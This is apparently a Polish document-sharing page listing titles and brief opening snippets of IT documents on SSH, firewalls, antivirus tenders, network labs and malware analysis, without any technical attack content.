Serwer SSH. Wprowadzenie do serwera SSH Instalacja i konfiguracja Zarządzanie kluczami Serwer SSH Serwer SSH Wprowadzenie do serwera SSH Instalacja i konfiguracja Zarządzanie kluczami Serwer SSH - Wprowadzenie do serwera SSH Praca na odległość potrzeby w zakresie bezpieczeństwa Identyfikacja

Bardziej szczegółowo

ArcaVir 2008 System Protection

ArcaVir 2008 System Protection ArcaVir 2008 System Protection ARCAVIR 2008 SYSTEM PROTECTION to oprogramowanie typu Internet Security stanowiące pełne zabezpieczenie przed zagrożeniami z Internetu i sieci LAN. OCHRONA ANTYWIRUSOWA Silnik

Bardziej szczegółowo

Sieci komputerowe. Zajęcia 3 c.d. Warstwa transportu, protokoły UDP, ICMP

Sieci komputerowe. Zajęcia 3 c.d. Warstwa transportu, protokoły UDP, ICMP Sieci komputerowe Zajęcia 3 c.d. Warstwa transportu, protokoły UDP, ICMP Zadania warstwy transportu Zapewnienie niezawodności Dostarczanie danych do odpowiedniej aplikacji w warstwie aplikacji (multipleksacja)

Bardziej szczegółowo

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze Specyfikacja oprogramowania do Opis zarządzania przedmiotu i monitorowania zamówienia środowiska Załącznik nr informatycznego 1 do specyfikacji Lp. 1. a) 1. Oprogramowanie oprogramowania i do systemów

Bardziej szczegółowo

Sprawozdanie. (notatki) Sieci komputerowe i bazy danych. Laboratorium nr.3 Temat: Zastosowanie protokołów przesyłania plików

Sprawozdanie. (notatki) Sieci komputerowe i bazy danych. Laboratorium nr.3 Temat: Zastosowanie protokołów przesyłania plików Sprawozdanie (notatki) Sieci komputerowe i bazy danych Laboratorium nr.3 Temat: Zastosowanie protokołów przesyłania plików Piotr Morawiec 22.03.2017 FTP (ang. File transfer Protocol) - protokół wymiany

Bardziej szczegółowo

Laboratorium nr 1 Skanowanie sieci i ataki aktywne

Laboratorium nr 1 Skanowanie sieci i ataki aktywne Laboratorium nr 1 Skanowanie sieci i ataki aktywne Laboratorium nr 1 jest poświęcone różnym technikom skanowania sieci oraz wybranym atakom aktywnym. W tym celu będziemy używać aplikacji dostępnych w systemie

Bardziej szczegółowo

ABC systemu Windows 2016 PL / Danuta Mendrala, Marcin Szeliga. Gliwice, cop Spis treści

ABC systemu Windows 2016 PL / Danuta Mendrala, Marcin Szeliga. Gliwice, cop Spis treści ABC systemu Windows 2016 PL / Danuta Mendrala, Marcin Szeliga. Gliwice, cop. 2016 Spis treści Wstęp 9 1 Instalacja i aktualizacja systemu 13 Przygotowanie do instalacji 14 Wymagania sprzętowe 14 Wybór

Bardziej szczegółowo

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego 2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego produktu. 23 czerwca 2014 Spis treści 3 Spis treści...5

Bardziej szczegółowo

Windows W celu dostępu do i konfiguracji firewall idź do Panelu sterowania -> System i zabezpieczenia -> Zapora systemu Windows.

Windows W celu dostępu do i konfiguracji firewall idź do Panelu sterowania -> System i zabezpieczenia -> Zapora systemu Windows. Bezpieczeństwo Systemów Informatycznych Firewall (Zapora systemu) Firewall (zapora systemu) jest ważnym elementem bezpieczeństwa współczesnych systemów komputerowych. Jego główną rolą jest kontrola ruchu

Bardziej szczegółowo

MBUM #2 MikroTik Beer User Meeting

MBUM #2 MikroTik Beer User Meeting MikroTik Beer User Meeting Zabezpieczenie routerów MikroTik. Omówienie ostatnio ujawnionych luk. Michał Filipek Michał Filipek Ukończył Politechnikę Warszawską na kierunku Informatyka. Na przestrzeni ostatnich

Bardziej szczegółowo

Otwock dn r. Do wszystkich Wykonawców

Otwock dn r. Do wszystkich Wykonawców Otwock dn. 03.08.2017 r. Do wszystkich Wykonawców Dotyczy zapytania ofertowego na Dostawę systemu/oprogramowania zapewniającego ochronę antywirusową i antymalware ową sieci komputerowej SP ZOZ Szpitala

Bardziej szczegółowo

Kierunek: technik informatyk 312[01] Semestr: II Przedmiot: Urządzenia techniki komputerowej Nauczyciel: Mirosław Ruciński

Kierunek: technik informatyk 312[01] Semestr: II Przedmiot: Urządzenia techniki komputerowej Nauczyciel: Mirosław Ruciński Kierunek: technik informatyk 312[01] Semestr: II Przedmiot: Urządzenia techniki komputerowej Nauczyciel: Mirosław Ruciński Temat 8.9. Wykrywanie i usuwanie awarii w sieciach komputerowych. 1. Narzędzia

Bardziej szczegółowo

Administrator systemu Linux program kursu. Wstęp. Część I Szybki wstęp do Linuksa. Część II Praca w środowisku tekstowym

Administrator systemu Linux program kursu. Wstęp. Część I Szybki wstęp do Linuksa. Część II Praca w środowisku tekstowym Wstęp Administrator systemu Linux program kursu Poniżej przedstawiony jest program kursu administracji serwerów linuksowych organizowanego przez Akademię Linuksa. Wszystkie zajęcia prowadzone są przy komputerach

Bardziej szczegółowo

Projektowanie bezpieczeństwa sieci i serwerów

Projektowanie bezpieczeństwa sieci i serwerów Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

INSTRUKCJA OBSŁUGI DLA SIECI

INSTRUKCJA OBSŁUGI DLA SIECI INSTRUKCJA OBSŁUGI DLA SIECI Zapisywanie dziennika druku w lokalizacji sieciowej Wersja 0 POL Definicje dotyczące oznaczeń w tekście W tym Podręczniku użytkownika zastosowano następujące ikony: Uwagi informują

Bardziej szczegółowo

Skanowanie podsieci oraz wykrywanie terminali ABA-X3

Skanowanie podsieci oraz wykrywanie terminali ABA-X3 Skanowanie podsieci oraz wykrywanie terminali ABA-X3 Terminale ABA-X3 od dostarczane od połowy listopada 2010 r. są wyposażane w oprogramowanie umożliwiające skanowanie podsieci w poszukiwaniu aktywnych

Bardziej szczegółowo

Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe. Parametry wymagane przez Zamawiającego

Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe. Parametry wymagane przez Zamawiającego Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe Lp. Parametry wymagane przez Zamawiającego (nazwa oferowanego oprogramowania) Parametry oferowane przez Wykonawcę (TAK- parametry zgodne z wymaganymi

Bardziej szczegółowo

Cyber-zagrożenia Zagrożenia współczesnych technologii teleinformatycznych z punku widzenia organów ścigania w globalnej sieci Internet

Cyber-zagrożenia Zagrożenia współczesnych technologii teleinformatycznych z punku widzenia organów ścigania w globalnej sieci Internet www.kujawsko-pomorska.policja.gov.pl Cyber-zagrożenia Zagrożenia współczesnych technologii teleinformatycznych z punku widzenia organów ścigania w globalnej sieci Internet Wydział dw. z Cyberprzestępczością

Bardziej szczegółowo

Produkty. ESET Produkty

Produkty. ESET Produkty Produkty ESET Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE ESET Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych

Bardziej szczegółowo

Produkty. MKS Produkty

Produkty. MKS Produkty Produkty MKS Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE MKS Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych

Bardziej szczegółowo

Fiery Remote Scan. Uruchamianie programu Fiery Remote Scan. Skrzynki pocztowe

Fiery Remote Scan. Uruchamianie programu Fiery Remote Scan. Skrzynki pocztowe Fiery Remote Scan Program Fiery Remote Scan umożliwia zarządzanie skanowaniem na serwerze Fiery server i drukarce ze zdalnego komputera. Programu Fiery Remote Scan można użyć do wykonania następujących

Bardziej szczegółowo

Audytowane obszary IT

Audytowane obszary IT Załącznik nr 1 do OPZ Zakres audytu wewnętrznego Audytowane obszary IT Audyt bezpieczeństwa wewnętrznego odbywać się będzie w 5 głównych obszarach 1) Audyt konfiguracji systemów operacyjnych na wybranych

Bardziej szczegółowo

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego ZADANIE V OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego A. ROZMIARY I CHARAKTER ZADANIA 1. W ramach dostawy oprogramowania antywirusowego Szpital

Bardziej szczegółowo

Podstawy Informatyki. Wykład 4 Komendy UNIXa, cd

Podstawy Informatyki. Wykład 4 Komendy UNIXa, cd Podstawy Informatyki Wykład 4 Komendy UNIXa, cd Komendy UNIXa, cd: ls - listowanie zawartości katalogu (listing), 48%{sendzimir}/home/sysadm/wilk/dydaktyka/c>ls kar* karman* karman.cpp karman.out press.dat

Bardziej szczegółowo

Usługi sieciowe systemu Linux

Usługi sieciowe systemu Linux Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do

Bardziej szczegółowo

Internetowe BD 2007. P.Skrobanek 1. INTERNETOWE BAZY DANYCH materiały pomocnicze - wykład IV. Paweł Skrobanek PLAN NA DZIŚ :

Internetowe BD 2007. P.Skrobanek 1. INTERNETOWE BAZY DANYCH materiały pomocnicze - wykład IV. Paweł Skrobanek PLAN NA DZIŚ : Wrocław 2006(07) INTERNETOWE BAZY DANYCH materiały pomocnicze wykład IV Paweł Skrobanek C3, pok. 323 email: pawel.skrobanek@pwr.wroc.pl PLAN NA DZIŚ : 1. Wprowadzenie bezpieczeństwo 2. Umiejscowienie bazy

Bardziej szczegółowo

Podstawy zabezpieczania serwera. Marcin Bieńkowski

Podstawy zabezpieczania serwera. Marcin Bieńkowski komputerowa Podstawy zabezpieczania serwera Marcin Bieńkowski Instytut Informatyki Uniwersytet Wrocławski komputerowa () Podstawy zabezpieczania serwera 1 / 17 Z oczywistych przyczyn... Pojawia się tu

Bardziej szczegółowo

Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce WWW

Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce WWW Instytut Sterowania i Systemów Informatycznych Uniwersytet Zielonogórski Praca z programami SAS poza lokalną siecią komputerową UZ. Zestawienie tunelu SSH oraz konfiguracja serwera proxy w przeglądarce

Bardziej szczegółowo

Wykład 5: Najważniejsze usługi sieciowe: DNS, SSH, HTTP, e-mail. A. Kisiel,Protokoły DNS, SSH, HTTP, e-mail

Wykład 5: Najważniejsze usługi sieciowe: DNS, SSH, HTTP, e-mail. A. Kisiel,Protokoły DNS, SSH, HTTP, e-mail N, Wykład 5: Najważniejsze usługi sieciowe: DNS, SSH, HTTP, e-mail 1 Domain Name Service Usługa Domain Name Service (DNS) Protokół UDP (port 53), klient-serwer Sformalizowana w postaci protokołu DNS Odpowiada

Bardziej szczegółowo

Audyt zasobów sprzętowych i systemowych (za pomocą dostępnych apletów Windows oraz narzędzi specjalnych)

Audyt zasobów sprzętowych i systemowych (za pomocą dostępnych apletów Windows oraz narzędzi specjalnych) Audyt zasobów sprzętowych i systemowych (za pomocą dostępnych apletów Windows oraz narzędzi specjalnych) SYSTEM OPERACYJNY I JEGO OTOCZENIE System operacyjny/wersja, uaktualnienia, klucz produktu Stan

Bardziej szczegółowo

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r.

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. W dniach 21 25 stycznia 2012 miał miejsce szereg ataków na zasoby instytucji administracji państwowej,

Bardziej szczegółowo

Obsługa poczty elektronicznej w domenie emeritus.ue.poznan.pl

Obsługa poczty elektronicznej w domenie emeritus.ue.poznan.pl Obsługa poczty elektronicznej w domenie emeritus.ue.poznan.pl Centrum Informatyki http://ci.ue.poznan.pl helpdesk@ue.poznan.pl al. Niepodległości 10, 61-875 Poznań tel. + 48 61 856 90 00 NIP: 777-00-05-497

Bardziej szczegółowo

Tomasz Greszata - Koszalin

Tomasz Greszata - Koszalin T: Usługi serwerowe w systemie Windows - telnet. Zadanie1: Sprawdź informacje w serwisie Wikipedii na temat usługi telnet. Telnet standard protokołu komunikacyjnego używanego w sieciach komputerowych do

Bardziej szczegółowo

System Kancelaris. Zdalny dostęp do danych

System Kancelaris. Zdalny dostęp do danych Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,

Bardziej szczegółowo

Zadanie 1 Treść zadania:

Zadanie 1 Treść zadania: Zadanie 1 Treść zadania: 1 2 Komentarz do zadania: Ocenie podlegały następujące elementy projektu: 1. Tytuł pracy egzaminacyjnej. 2. Założenia do projektu. 3. Lista prawdopodobnych przyczyn usterki systemu

Bardziej szczegółowo

Efektywne zarządzanie infrastrukturą IT, inwentaryzacja sprzętu i oprogramowania oraz ochrona danych przed wyciekiem dzięki wdrożeniu Axence nvesion

Efektywne zarządzanie infrastrukturą IT, inwentaryzacja sprzętu i oprogramowania oraz ochrona danych przed wyciekiem dzięki wdrożeniu Axence nvesion Efektywne zarządzanie infrastrukturą IT, inwentaryzacja sprzętu i oprogramowania oraz ochrona danych przed wyciekiem dzięki wdrożeniu Axence nvesion 6.0 Maciej Kubat www.axencesoftware.com NETWORK Monitorowanie

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja jesień 2005)

Pracownia internetowa w każdej szkole (edycja jesień 2005) Instrukcja numer SPD1/04_03/Z2 Pracownia internetowa w każdej szkole (edycja jesień 2005) Opiekun pracowni internetowej cz. 1 (PD1) Przygotowanie własnego obrazu systemu operacyjnego dla stacji roboczych

Bardziej szczegółowo

Bezpieczeństwo Systemów Telekomunikacyjnych 2014 / 2015 Bezpieczeństwo aplikacji sieciowych, Ataki (D)DoS Prowadzący: Jarosław Białas

Bezpieczeństwo Systemów Telekomunikacyjnych 2014 / 2015 Bezpieczeństwo aplikacji sieciowych, Ataki (D)DoS Prowadzący: Jarosław Białas Wprowadzenie Celem tego laboratorium jest zapoznanie się z metodami ataku (D)DoS zarówno od strony atakującej jak i atakowanej. Uczestnicy laboratorium będą mieli za zadanie zbudowanie platformy testowej

Bardziej szczegółowo

Windows Serwer 2008 R2. Moduł 5. Zarządzanie plikami

Windows Serwer 2008 R2. Moduł 5. Zarządzanie plikami Windows Serwer 2008 R2 Moduł 5. Zarządzanie plikami Sprawdzamy konfigurację kart sieciowych 172.16.x.0 x nr w dzienniku Na serwerze musi działać Internet! Statyczny adres IP jest potrzebny komputerom,

Bardziej szczegółowo

Robaki sieciowe. + systemy IDS/IPS

Robaki sieciowe. + systemy IDS/IPS Robaki sieciowe + systemy IDS/IPS Robak komputerowy (ang. computer worm) samoreplikujący się program komputerowy, podobny do wirusa komputerowego, ale w przeciwieństwie do niego nie potrzebujący nosiciela

Bardziej szczegółowo

Problemy techniczne SQL Server

Problemy techniczne SQL Server Problemy techniczne SQL Server Co zrobić, jeśli program Optivum nie łączy się poprzez sieć lokalną z serwerem SQL? Programy Optivum, które korzystają z bazy danych umieszczonej na serwerze SQL, mogą być

Bardziej szczegółowo

Wymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk:

Wymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk: Nr Sprawy KP- 42 /2006 Załącznik nr 1 Do Specyfikacji Istotnych Warunków Zamówienia Wymagania techniczne dla programów antywirusowych Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość

Bardziej szczegółowo

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak Wykład 3 / Wykład 4 Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak 1 Wprowadzenie do Modułu 3 CCNA-E Funkcje trzech wyższych warstw modelu OSI W jaki sposób ludzie wykorzystują

Bardziej szczegółowo

MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1

MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1 MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1 NetCrunch 7 monitoruje systemy MS Windows bez instalowania dodatkowych agentów. Jednakże, ze względu na zaostrzone zasady bezpieczeństwa, zdalne monitorowanie

Bardziej szczegółowo

Narzędzia do diagnozowania sieci w systemie Windows

Narzędzia do diagnozowania sieci w systemie Windows Narzędzia do diagnozowania sieci w systemie Windows Polecenie ping Polecenie wysyła komunikaty ICMP Echo Request w celu weryfikacji poprawności konfiguracji protokołu TCP/IP oraz dostępności odległego

Bardziej szczegółowo

Sieci komputerowe laboratorium

Sieci komputerowe laboratorium Sieci komputerowe laboratorium Temat ćwiczenia: Konfiguracja zapory ogniowej. Cel ćwiczenia Celem ćwiczenia jest zapoznanie się z podstawowymi metodami ataków na system komputerowy, z metodami wykrywania

Bardziej szczegółowo

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Status: Tajemnica handlowa Wersja z dnia: 23 października 2013 Strona: 1 z 8 SPIS TREŚCI 1. Wymagania dla serwera

Bardziej szczegółowo

Rozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione.

Rozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione. Rozdział 6 - Z kim się kontaktować - 199 - Spis treści - 200 - Rozdział 6 - Z kim się kontaktować Spis treści Rozdział 1: Podstawy bezpiecznego użytkowania komputera... - 3 - Dlaczego należy aktualizować

Bardziej szczegółowo

Doskonalenie podstaw programowych kluczem do modernizacji kształcenia zawodowego

Doskonalenie podstaw programowych kluczem do modernizacji kształcenia zawodowego rojekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego 9. Administracja sieciowymi systemami operacyjnymi Uszczegółowione efekty kształcenia Uczeń po zrealizowaniu zajęć

Bardziej szczegółowo

Sieci komputerowe. Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2007/2008. Michał Cieśla

Sieci komputerowe. Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2007/2008. Michał Cieśla Sieci komputerowe Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2007/2008 Michał Cieśla pok. 440a, email: ciesla@if.uj.edu.pl konsultacje: wtorki 10-12 http://users.uj.edu.pl/~ciesla/

Bardziej szczegółowo

Firewalle, maskarady, proxy

Firewalle, maskarady, proxy Firewalle, maskarady, proxy Patryk Czarnik Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski Bezpieczeństwo sieci komputerowych MSUI 2010/11 Patryk Czarnik (MIMUW) 09 Firewall BSK 2010/11

Bardziej szczegółowo

Fiery Remote Scan. Łączenie z serwerami Fiery servers. Łączenie z serwerem Fiery server przy pierwszym użyciu

Fiery Remote Scan. Łączenie z serwerami Fiery servers. Łączenie z serwerem Fiery server przy pierwszym użyciu Fiery Remote Scan Program Fiery Remote Scan umożliwia zarządzanie skanowaniem na serwerze Fiery server i drukarce ze zdalnego komputera. Programu Fiery Remote Scan można użyć do wykonania następujących

Bardziej szczegółowo

Firewalle, maskarady, proxy

Firewalle, maskarady, proxy Firewalle, maskarady, proxy Patryk Czarnik Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski Bezpieczeństwo sieci komputerowych MSUI 2009/10 Patryk Czarnik (MIMUW) 08 Firewall BSK 2009/10

Bardziej szczegółowo

Firewalle, maskarady, proxy

Firewalle, maskarady, proxy Firewalle, maskarady, proxy Patryk Czarnik Bezpieczeństwo sieci komputerowych MSUI 2010/11 Kontrola dostępu Polityka kontroli dostępu określa sposób dostępu do poszczególnych zasobów organizacji. Może

Bardziej szczegółowo

Wykaz zmian w programie Win Admin Replikator

Wykaz zmian w programie Win Admin Replikator Wykaz zmian w programie Win Admin Replikator Pierwsza wersja programu 1.0.0.0 powstała w czerwcu 2010. kod źródłowy programu zawiera ponad 6 900 wierszy. Modyfikacje/zmiany w wersji 1.0.4.0 (październik

Bardziej szczegółowo

System kontroli dostępu ACCO NET Instrukcja instalacji

System kontroli dostępu ACCO NET Instrukcja instalacji System kontroli dostępu ACCO NET Instrukcja instalacji acco_net_i_pl 12/14 SATEL sp. z o.o. ul. Budowlanych 66 80-298 Gdańsk POLSKA tel. 58 320 94 00 serwis 58 320 94 30 dz. techn. 58 320 94 20; 604 166

Bardziej szczegółowo

Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY

Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY 4 sierpnia 2014 r. W dniach 1 do 4 sierpnia 2014 r. poddaliśmy analizie oprogramowanie

Bardziej szczegółowo

SIECI KOMPUTEROWE I TECHNOLOGIE INTERNETOWE

SIECI KOMPUTEROWE I TECHNOLOGIE INTERNETOWE Politechnika Gdańska Wydział Elektrotechniki i Automatyki Katedra Inżynierii Systemów Sterowania SIECI KOMPUTEROWE I TECHNOLOGIE INTERNETOWE Temat: Identyfikacja właściciela domeny. Identyfikacja tras

Bardziej szczegółowo

Program szkolenia KURS SPD i PD Administrator szkolnej pracowni internetowej Kurs MD1 Kurs MD2 Kurs MD3 (dla szkół ponadgimnazjalnych)

Program szkolenia KURS SPD i PD Administrator szkolnej pracowni internetowej Kurs MD1 Kurs MD2 Kurs MD3 (dla szkół ponadgimnazjalnych) Miejsce prowadzenia szkolenia Program szkolenia KURS SPD i PD Administrator pracowni internetowej Kurs MD1 Kurs MD2 Kurs MD3 (dla szkół ponadgimnazjalnych) Pracownie komputerowe znajdujące się w wyznaczonych

Bardziej szczegółowo

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. HTTP (ang. Hypertext Transfer Protocol) protokół transferu plików

Bardziej szczegółowo

Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A

Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Spis treści Spis treści... 2 Wprowadzenie... 3 Przeznaczenie... 3 Moduły... 3 Koncepcja działania... 3 Wymagania... 4 Instalacja... 5 Używanie

Bardziej szczegółowo

Asix. Konfiguracja serwera MS SQL dla potrzeb systemu Asix. Pomoc techniczna NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI

Asix. Konfiguracja serwera MS SQL dla potrzeb systemu Asix. Pomoc techniczna NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI Asix Konfiguracja serwera MS SQL dla potrzeb systemu Asix Pomoc techniczna Dok. Nr PLP0024 Wersja:2015-03-04 ASKOM i Asix to zastrzeżony znak firmy ASKOM Sp.

Bardziej szczegółowo

Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych.

Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych. Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych. Jerzy Mikołajczak, Sebastian Petruczynik, Marek Zawadzki support-mic@man.poznan.pl 1 Plan prezentacji: 1. Wstęp

Bardziej szczegółowo

Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A

Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Spis treści Spis treści... 2 Wprowadzenie... 3 Przeznaczenie... 3 Moduły... 3 Koncepcja działania... 3 Wymagania... 4 Instalacja... 5 Używanie

Bardziej szczegółowo

NETWORK Monitorowanie serwerów, urządzeń i aplikacji INVENTORY Inwentaryzacja sprzętu i oprogramowania, audyty legalności USERS Monitorowanie

NETWORK Monitorowanie serwerów, urządzeń i aplikacji INVENTORY Inwentaryzacja sprzętu i oprogramowania, audyty legalności USERS Monitorowanie www.axence.pl NETWORK Monitorowanie serwerów, urządzeń i aplikacji INVENTORY Inwentaryzacja sprzętu i oprogramowania, audyty legalności USERS Monitorowanie pracowników HELPDESK Zdalny dostęp, zgłoszenia

Bardziej szczegółowo

Hosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas)

Hosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas) Hosting WWW Bezpieczeństwo hostingu WWW Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas) Najgroźniejsze ataki na serwer WWW Najgroźniejsze ataki na serwer WWW Cross-site scripting (XSS) SQL injection Denial

Bardziej szczegółowo

Metody zabezpieczania transmisji w sieci Ethernet

Metody zabezpieczania transmisji w sieci Ethernet Metody zabezpieczania transmisji w sieci Ethernet na przykładzie protokołu PPTP Paweł Pokrywka Plan prezentacji Założenia Cele Problemy i ich rozwiązania Rozwiązanie ogólne i jego omówienie Założenia Sieć

Bardziej szczegółowo

Informacje które należy zebrać przed rozpoczęciem instalacji RelayFax.

Informacje które należy zebrać przed rozpoczęciem instalacji RelayFax. Informacje które należy zebrać przed rozpoczęciem instalacji RelayFax. Program instalacyjny RelayFax będzie prosił o podanie kilku informacji w trakcie procesu instalacji, które są wymagane do poprawnego

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

Domain Name System. Kraków, 30 Marca 2012 r. mgr Piotr Rytko Wydział Matematyki i Informatyki UJ

Domain Name System. Kraków, 30 Marca 2012 r. mgr Piotr Rytko Wydział Matematyki i Informatyki UJ Domain Name System Kraków, 30 Marca 2012 r. mgr Piotr Rytko Wydział Matematyki i Informatyki UJ Plan ćwiczeń Wprowadzenie, jak to wygląda, typy serwerów, zapytania, iteracyjne, rekurencyjne, pliki strefowe

Bardziej szczegółowo

Instalacja i konfiguracja serwera SSH.

Instalacja i konfiguracja serwera SSH. Instalacja i konfiguracja serwera SSH. Podczas wykonywania poniższych zadań w zeszycie w sprawozdaniu 1. podaj i wyjaśnij polecenia, które użyjesz, aby: wyjaśnić pojęcia związane z ssh, zainstalować serwer

Bardziej szczegółowo

01. Bezpieczne korzystanie z urządzeń i systemów teleinformatycznych przez pracowników instytucji finansowych

01. Bezpieczne korzystanie z urządzeń i systemów teleinformatycznych przez pracowników instytucji finansowych Tabela z podziałem tzw. efektów uczenia na formę weryfikacji podczas egzaminu Stosowanie zasad cyber przez pracowników instytucji finansowych 01. Bezpieczne korzystanie z urządzeń i systemów teleinformatycznych

Bardziej szczegółowo

Sieci komputerowe. Wykład dr inż. Łukasz Graczykowski

Sieci komputerowe. Wykład dr inż. Łukasz Graczykowski Sieci komputerowe Wykład 7 24.04.2019 dr inż. Łukasz Graczykowski lukasz.graczykowski@pw.edu.pl Semestr letni 2018/2019 Bezpieczeństwo Hacker a cracker Hacker to osoba czasami znana z imienia i nazwiska,

Bardziej szczegółowo

Sieci komputerowe : zbuduj swoją własną sieć - to naprawdę proste! / Witold Wrotek. wyd. 2. Gliwice, cop Spis treści

Sieci komputerowe : zbuduj swoją własną sieć - to naprawdę proste! / Witold Wrotek. wyd. 2. Gliwice, cop Spis treści Sieci komputerowe : zbuduj swoją własną sieć - to naprawdę proste! / Witold Wrotek. wyd. 2. Gliwice, cop. 2016 Spis treści Wstęp 9 Dla kogo jest przeznaczona książka? 10 Komputer, smartfon, tablet 11 Jaką

Bardziej szczegółowo

Brinet sp. z o.o. wyłączny przedstawiciel DrayTek w Polsce www.brinet.pl www.draytek.pl

